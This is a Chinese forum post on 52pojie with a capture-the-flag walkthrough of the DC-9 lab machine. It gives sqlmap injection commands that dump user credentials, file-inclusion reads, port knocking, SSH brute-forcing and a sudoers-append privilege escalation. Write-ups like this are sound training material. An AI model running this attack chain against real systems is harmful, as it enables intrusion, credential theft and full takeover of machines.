吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2354|回复: 4
收起左侧

[CTF] 【DC系列09】DC-9靶机详解

  [复制链接]
yunkof 发表于 2023-11-25 09:41
本帖最后由 yunkof 于 2023-11-26 10:03 编辑

【DC系列09】DC-9靶机复盘

渗透测试靶机的作用是为了让新手更快学习和入门渗透测试而搭建的一种环境,另一种作用就是在真实渗透测试过程中真实环境不允许直接进行测试从而模仿真实的环境搭建一个相同环境进行测试。靶机,相当于部队训练场上,打枪时候的那个靶子,你要学习、练手。就需要有目标环境,就是说你现在有个枪,需要有个靶子来給你挨枪子儿,供你练习。
靶机下载地址:https://www.five86.com/downloads.html

同样我们对这个靶机进行一个扫描,先找到ip地址。

image-20230708123114261

然后再单独对这个ip地址进行扫描,发现打开了22端口和80端口,但是我们现在不能访问22端口。

image-20230708123823068

这里我们搜索以下,网址没有明显变化就是post请求,所以猜测是有数据库的。

image-20230708124323846

抓包看以下,发现的确是有post请求。

image-20230708124308518

对数据库进行一个扫描,发现有两个数据库,第一个是默认带的。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=2' --dbs --batch

image-20230708124646428

先扫描了一下user数据库,发现里面有一个表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users --tables --batch

image-20230708125245075

提取一下表中的列,发现有username和password.

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails --columns --batch

image-20230708125337318

把用户名和密码提取出来,sqlman专门帮我们保存到了一个csv文件中去了。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails -C 'username,password' --dump

image-20230708125517965

对用户名和密码进行一个单独的保存,方便等会的爆破。

cat /root/.local/share/sqlmap/output/192.168.102.151/dump/users/UserDetails.csv|awk -F, '{print $1}' > pass

image-20230708125855084

再看看Staff数据库,发现里面有一个Users表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff --tables --batch

image-20230708125939851

发现这个表中也有一个账号密码。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users --columns

image-20230708130210745

发现用户名是admin,密码是一个md5,不出以为这应该就是网站后台登陆账户。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users -C 'Username,Password' --dump --batch

image-20230708130224187

破解一下md5,密码就出来了。

image-20230708130334910

后台登陆一下,发现成功登陆了上去。

image-20230708130404615

只多了一个Add Record菜单,我们提交一些数据。

image-20230708130603144

发现下面file does not exist,所以猜测这里面有个文件包含漏洞。

image-20230708130643732

尝试了以下发现果然有一个文件包含。

image-20230708130729307

/proc/sched_debug是一个Linux内核中的虚拟文件,文件包含了一个完整的调度器状态快照,包括所有运行的进程及它们的状态、进程的调度策略、调度队列、调度器的负载平衡状态等。

我们发现了knockd的进程,knockd是一个守护进程,它在后台运行,并等待接收预定义的端口序列。当它接收到正确的端口序列时,它会执行预定义的安全操作。这个过程类似于“敲门”,因此它被称为knockd。

image-20230708131645608

我们查看一下这个进程文件,发现里面是有三个参数,意思就是,当SSH按照这个顺序收到三个syn包后,ssh才可以开启。

image-20230708131726238

利用knock工具我们可以向目标主机发送三个syn包,再用nmap扫描一下,发现22端口开启了。

image-20230708132003965

这时候我们利用hyrad爆破以下ssh,用户名和密码字典就是我们sqlmap在数据库中找到的,发现有三个用户。

image-20230708132213909

经过尝试只有第三个里面有点利用东西,第一个第二个没找到线索。

image-20230708132436007

第三个用户登陆进去后ls -al发现一个隐藏目录,进去后发现有一个密码字典。

image-20230708132610725

把新发现的字典在爆破一下,发现了两个新的用户。

image-20230708133830369

登陆上fredf用户,sudo -l发现fredf用户可以免密使用root权限的文件有一个。

image-20230708133934843

image-20230708134342332

这里面的意思就是这个命令有两个参数,打开第一个文件,追加到第二个文件中去。

image-20230708134421143

既然是root权限,我们就可以提升我们这个用户的权限为ALL,和root用户权限是一样的,

把这个命令先写到一个文件中去。然后利用test命令追加到/etc/sudoers中去。

fredf ALL=(ALL:ALL) ALL

image-20230708135504826

然后sudo su -提升下自己的权限就可以了

image-20230708135348134

其他章节

DC1,DC2:https://www.52pojie.cn/thread-1802206-1-1.html
DC3,DC4:https://www.52pojie.cn/thread-1805631-1-1.html
DC5,DC6:https://www.52pojie.cn/thread-1808585-1-1.html
DC7,DC8:https://www.52pojie.cn/thread-1814113-1-1.html

免费评分

参与人数 8吾爱币 +14 热心值 +6 收起 理由
笙若 + 1 + 1 谢谢@Thanks!
freebanner + 1 + 1 我很赞同!
Summer466 + 1 热心回复!
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
janken + 1 + 1 热心回复!
chinawolf2000 + 1 + 1 热心回复!
bury咩 + 1 + 1 热心回复!
Ruomeng + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| yunkof 发表于 2023-11-25 09:45
以前打的,因为gitee图床有反扒机制,所以上传到论坛的图片是看不到的,现在把图片都转移到阿里图床了,就有机会上传过来了。
gumuqi 发表于 2023-11-28 07:29
刀大喵 发表于 2023-11-28 15:59
 楼主| yunkof 发表于 2023-11-28 16:03
刀大喵 发表于 2023-11-28 15:59
怎么判断存在文件包含的呢

在已知的一个页面中又打开了另一个页面或者文件
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-23 15:52

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表